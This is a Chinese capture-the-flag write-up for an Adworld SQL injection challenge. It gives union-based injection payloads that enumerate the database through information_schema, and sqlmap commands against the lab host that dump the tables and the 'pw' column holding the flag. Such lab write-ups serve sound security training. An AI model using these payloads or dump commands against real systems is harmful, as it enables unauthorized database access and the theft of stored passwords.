攻防世界的inget SQL注入
打开场景
文中翻译过来就是让我绕过ID 感觉有点SQL注入的感觉
先一个个试试
?id=1'union select 1,2 --+
发现确实存在SQL注入
懂了 先手工测测,能手工就手工,最后再跑sqlmap验证
?id=1' union select 1,database()--+
直接爆出来数据库名 cyber
这就好办了,利用 group_concat()
?id=1' union select 2,group_concat(table_name) from information_schema.tables where table_schema = 'cyber'--+
发现爆出来表还是cyber
继续利用 爆出字段
?id=1' union select 2,group_concat(column_name) from information_schema.columns where table_schema = 'cyber'--+
发现爆出来三个字段
不用想 以攻防世界的尿性flag肯定在pw字段
直接查看
直接得到flag
下面使用sqlmap直接跑出来flag
python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -dbs
利用这个跑出数据库
发现跑出来了数据库 cyber
继续
python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -D cyber --tables
跑出表
发现跑出了表cyber
继续
python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -D cyber -T cyber --columns
跑出字段
查看
python sqlmap.py - u "http://61.147.171.105:63578/index.php?id=1" -D cyber -T cyber -C pw --dump
ok 得到了字段内容 也就得到了flag 新手做CTF的时候最好不要一开始就用sqlmap,最好自己手工注入